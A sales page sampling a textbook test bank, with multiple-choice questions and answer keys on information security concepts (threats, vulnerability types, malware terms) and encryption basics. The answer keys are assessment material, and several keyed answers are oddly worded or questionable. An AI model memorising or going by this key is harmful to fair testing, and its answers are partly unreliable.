Information Security And IT Risk Management 1st Edition by Manish Agrawal – Test Bank
To Purchase this Complete Test Bank with Answers Click the link Below
If face any problem or
Further information contact us At tbzuiqe@gmail.com
Sample Questions
|
Information security and IT risk management – Question bank By Manish Agrawal, Alex Campoe and Eric Pierce |
- Chapter 4 – Basic information security model
1.
Assets are
1.
a) Resources or information that is to be protected
2.
b) Safeguards used to minimize the impact of
threats
3.
c) Capabilities, intentions and attack methods of
adversaries to cause harm to assets
4.
d) Weaknesses in an information system that can
lead to a compromise of an asset
Answer: (a)
2.
Threats are
1.
a) Safeguards used to minimize the impact of
threats
2.
b) Capabilities, intentions and attack methods of
adversaries to cause harm to assets
3.
c) Resource or information that is to be protected
4.
d) Weaknesses in an information system that can
lead to a compromise of an asset
Answer: (b)
3.
Relative to physical security, information security
is challenging because
1.
a) Assets are largely invisible
2.
b) Most assets are easily duplicated
3.
c) Both the above
4.
d) None of the above
Answer: (c)
4.
Vulnerabilities are
1.
a) Safeguards used to minimize the impact of
threats
2.
b) Capabilities, intentions and attack methods of
adversaries to cause harm to assets
3.
c) Resource or information that is to be protected
4.
d) Weaknesses in an information system that can
lead to a compromise of an asset
Answer: (d)
5.
Controls are
1.
a) Safeguards used to minimize the impact of
threats
2.
b) Capabilities, intentions and attack methods of
adversaries to cause harm to assets
3.
c) Resource or information that is to be protected
4.
d) Weaknesses in an information system that can
lead to a compromise of an asset
Answer: (a)
6.
Vulnerabilities in IT systems can be eliminated
through secure coding practices
1.
a) True
2.
b) False
Answer: (b)
7.
Models are useful because
1.
a) They highlight resource or information that is
to be protected
2.
b) They highlight weaknesses in information systems
that can be compromised
3.
c) They draw attention to the essential details of
a problem
4.
d) They describe safeguards used to minimize the
impact of threats
Answer: (c)
8.
The CVE list is
1.
a) A list of all likely impacts of vulnerabilities
2.
b) A list of all known viruses
3.
c) A list of all known information security firms
4.
d) An inventory of known software vulnerabilities
Answer: (d)
9.
The NVD database
1.
a) Describes likely impacts and measures to remove
vulnerabilities
2.
b) A list of all known viruses
3.
c) A list of all known information security firms
4.
d) An inventory of known software vulnerabilities
Answer: (a)
10.
As reported in the chapter, recent trends in
vulnerabilities and threats indicate that
1.
a) Increasing numbers of new vulnerabilities are
being discovered, and the number of attacks is also going up
2.
b) Decreasing numbers of new vulnerabilities are
being discovered, but the number of attacks is going up
3.
c) Decreasing numbers of new vulnerabilities are
being discovered, and the number of attacks is also going down
4.
d) Increasing numbers of new vulnerabilities are
being discovered, but the number of attacks is going down
Answer: (b)
11.
Zeus and Spyeye are examples of
1.
a) Viruses
2.
b) Vulnerabilities
3.
c) IDEs to create new attacks
4.
d) Systems to defend against attacks
Answer: (c)
12.
A lack of input validation vulnerability refers to
a situation where
1.
a) Files are accepted as input without verifying
their specifications
2.
b) Input from other users is supplied as output to
other users
3.
c) A program puts more data into a storage location
than it can hold
4.
d) User input is used without confirming its
validity
Answer: (d)
13.
An unrestricted uploads vulnerability refers to a
situation where
1.
a) Files are accepted as input without verifying
their specifications
2.
b) Input from other users is supplied as output to
other users
3.
c) A program puts more data into a storage location
than it can hold
4.
d) User input is used without confirming its
validity
Answer: (a)
14.
A cross-site scripting vulnerability can occur when
1.
a) Files are accepted as input without verifying
their specifications
2.
b) Input from other users is supplied as output to
other users
3.
c) A program puts more data into a storage location
than it can hold
4.
d) User input is used without confirming its
validity
Answer: (b)
15.
A buffer overflow vulnerability refers to a
situation where
1.
a) Files are accepted as input without verifying
their specifications
2.
b) Input from other users is supplied as output to
other users
3.
c) A program puts more data into a storage location
than it can hold
4.
d) User input is used without confirming its
validity
Answer: (c)
16.
A SQL injection vulnerability is an example of a
1.
a) Unrestricted uploads vulnerability
2.
b) Cross-site scripting vulnerability
3.
c) Buffer overflow vulnerability
4.
d) Lack of input validation vulnerability
Answer: (d)
17.
A missing authorization vulnerability refers to a
situation where
1.
a) Users are allowed access to privileged parts of
a program without verification of credentials
2.
b) Input from other users is supplied as output to
other users
3.
c) A program puts more data into a storage location
than it can hold
4.
d) User input is used without confirming its
validity
Answer: (a)
18.
Denial of service refers to
1.
a) Programs that propagate through the network
without a user’s consent
2.
b) Unauthorized prevention of access to resources
3.
c) Attempting to compromise a user by masquerading
as a trustworthy entity in electronic communication
4.
d) Code specifically designed to exploit a computer
or data, without the user’s consent
Answer: (b)
19.
Phishing refers to
1.
a) Programs that propagate through the network
without a user’s consent
2.
b) Unauthorized prevention of access to resources
3.
c) Attempting to compromise a user by masquerading
as a trustworthy entity in electronic communication
4.
d) Code specifically designed to exploit a computer
or data, without the user’s consent
Answer: (c)
20.
Malware refers to
1.
a) Programs that propagate through the network
without a user’s consent
2.
b) Unauthorized prevention of access to resources
3.
c) Attempting to compromise a user by masquerading
as a trustworthy entity in electronic communication
4.
d) Code specifically designed to exploit a computer
or data, without the user’s consent
Answer: (d)
21.
Rootkits are
1.
a) Software used to hide the existence of malicious
software on computer systems
2.
b) Exploits that compromise a previously unknown
software vulnerability
3.
c) Computers that perform malicious tasks at the
direction of a remote controller
4.
d) Manipulating people into performing desired
actions
Answer: (a)
22.
Zero-day exploits are
1.
a) Software used to hide the existence of malicious
software on computer systems
2.
b) Exploits that compromise a previously unknown
software vulnerability
3.
c) Computers that perform malicious tasks at the
direction of a remote controller
4.
d) Manipulating people into performing desired
actions
Answer: (b)
23.
Zombies are
1.
a) Software used to hide the existence of malicious
software on computer systems
2.
b) Exploits that compromise a previously unknown
software vulnerability
3.
c) Computers that perform malicious tasks at the
direction of a remote controller
4.
d) Manipulating people into performing desired
actions
Answer: (c)
24.
Social engineering is
1.
a) Software used to hide the existence of malicious
software on computer systems
2.
b) Exploits that compromise a previously unknown
software vulnerability
3.
c) Computers that perform malicious tasks at the
direction of a remote controller
4.
d) Manipulating people into performing desired
actions
Answer: (d)
25.
Physical controls
1.
a) Use non-technical methods of preventing harm
2.
b) Are the security measures built into the
information system itself
3.
c) Perform malicious tasks at the direction of a
remote controller
4.
d) Manipulate people into performing desired
actions
Answer: (a)
|
Information security and IT risk management – Question bank By Manish Agrawal, Alex Campoe and Eric Pierce |
- Chapter 7 – Encryption controls
1.
Encryption is
1.
a) The transformation of data to produce ciphertext
2.
b) Text that is unintelligible to the reader
3.
c) A sequence of symbols that controls the
operations of encipherment and decipherment
4.
d) A well-defined sequence of steps used to describe
cryptographic processes
5.
e) An encryption method that uses no keys
Answer: (a)
2.
Ciphertext is
1.
a) The transformation of data to produce ciphertext
2.
b) Text that is unintelligible to the reader
3.
c) A sequence of symbols that controls the
operations of encipherment and decipherment
4.
d) A well-defined sequence of steps used to
describe cryptographic processes
5.
e) An encryption method that uses no keys
Answer: (b)
3.
The word Cipher is based on an Arabic word, cifr,
that means
1.
a) Sender
2.
b) Secret
3.
c) Nothing
4.
d) Receiver
Answer: (c)
4.
The first documented instance of encryption was
used by
1.
a) Egyptian pharaoh Tutankhamun
2.
b) Italian inventor Leonardo da Vinci
3.
c) Italian artist Michelangelo
4.
d) Roman Emperor Julius Caesar
Answer: (d)
5.
Cryptanalysis is
1.
a) The art of breaking ciphertext
2.
b) The transformation of data to produce ciphertext
3.
c) The science of creating superior encryption
algorithms
4.
d) Text that is unintelligible to the reader
Answer: (a)
6.
A cryptographic algorithm is
1.
a) Symbols that controls encipherment and
decipherment
2.
b) A well-defined sequence of steps used to
describe cryptographic processes
3.
c) An encryption method that uses no keys
4.
d) Text that is unintelligible to the reader
Answer: (b)
7.
In the context of encryption, a key is
1.
a) A well-defined sequence of steps used to
describe cryptographic processes
2.
b) An encryption method that uses no keys
3.
c) A sequence of symbols that controls the
operations of encipherment and decipherment
4.
d) Text that is unintelligible to the reader
Answer: (c)
8.
Desirable properties In good encryption algorithms
include
1.
a) Generating characters that appear random
2.
b) Generating output that appears to be of random
length
3.
c) Changing at least half the bits in the output
when even one bit changes in the input
4.
d) All the above
Answer: (d)
9.
Secret key cryptography refers to
1.
a) The use of the same key for both encryption and
decryption
2.
b) The use of a secret algorithm for encryption and
decryption
3.
c) The use of a secret key only for decryption
4.
d) The use of a secret key for encryption
Answer: (a)
10.
The current standard for secret key encryption is
1.
a) DES (Data Encryption Standard)
2.
b) AES (Advanced Encryption Standard)
3.
c) IDEA International Data Encryption Algorithm)
4.
d) SHA (Secure Hash Algorithm)
Answer: (b)
11.
Public Key cryptography refers to
1.
a) The use of the same key for both encryption and
decryption
2.
b) The use of a secret algorithm for encryption and
decryption
3.
c) The use of a secret key only decryption
4.
d) The use of a secret key for encryption
Answer: (c)
12.
In using public key encryption, messages are
deciphered using
1.
a) A public key
2.
b) A shared secret key
3.
c) Any key
4.
d) A private key
Answer: (d)
13.
Public key encryption is used primarily for
1.
a) Sharing a secret key prior to network
transmission
2.
b) Storing data on hard drives
3.
c) Encrypting data during transmission over a
network
4.
d) Saving passwords
Answer: (a)
14.
Digital signatures are
1.
a) The transformation of data to produce ciphertext
2.
b) The use of cryptography that allows a user to
prove the source and integrity of data
3.
c) Text that is unintelligible to the reader
4.
d) A sequence of symbols that controls the
operations of encipherment and decipherment
Answer: (b)
15.
Hash functions use
1.
a) 2 keys
2.
b) 1 key
3.
c) 0 keys
4.
d) Any of the above, depending upon the specific
hash algorithm
Answer: (c)
16.
Hash functions are used primarily for
1.
a) Sharing a secret key prior to network
transmission
2.
b) Storing data on hard drives
3.
c) Encrypting data during transmission over a
network
4.
d) Saving passwords
Answer: (d)
17.
Claude Shannon developed the framework for secrecy
known as
1.
a) Confusion diffusion
2.
b) 4P model
3.
c) 4C model
4.
d) Inversion of control
Answer: (a)
18.
Block encryption uses both
1.
a) Relational and Procedural operations
2.
b) Substitution and permutation
3.
c) Keys and hashes
4.
d) Data and storage
Answer: (b)
19.
Electronic Code Book (ECB) is not used for
encryption since it has inadequate
1.
a) Licensing flexibility
2.
b) Recovery features
3.
c) Diffusion of confusion
4.
d) Parallelism
Answer: (c)
20.
Public key encryption techniques used in practice
are based heavily on
1.
a) Division operations
2.
b) Set operations
3.
c) Extraction operations
4.
d) Modulus operations
Answer: (d)
21.
17 mod 11 is
1.
a) 6
2.
b) 8
3.
c) 7
4.
d) 0
Answer: (a)
22.
The popular encryption method RSA is an example of
1.
a) Secret key encryption
2.
b) Public key encryption
3.
c) Hash functions
4.
d) AES
Answer: (b)
23.
For any given input, the length of its hash out is
1.
a) Always shorter than the input
2.
b) Depends upon the length of the input
3.
c) Always the same
4.
d) Always longer than the input
Answer: (c)
24.
A certificate used in web applications contains the
1.
a) Shared secret key prior to network transmission
2.
b) The hash output of the data to be transmitted
3.
c) Saved password of the end user for recovery
4.
d) Public key of the server and information about
the key provider
Answer: (d)
25.
The most common technologies used for secure
network communication are
1.
a) VPN and SSL
2.
b) AES and DES
3.
c) PKI and RSA
4.
d) Diffusion and confusion
Answer: (a)
Comments
Post a Comment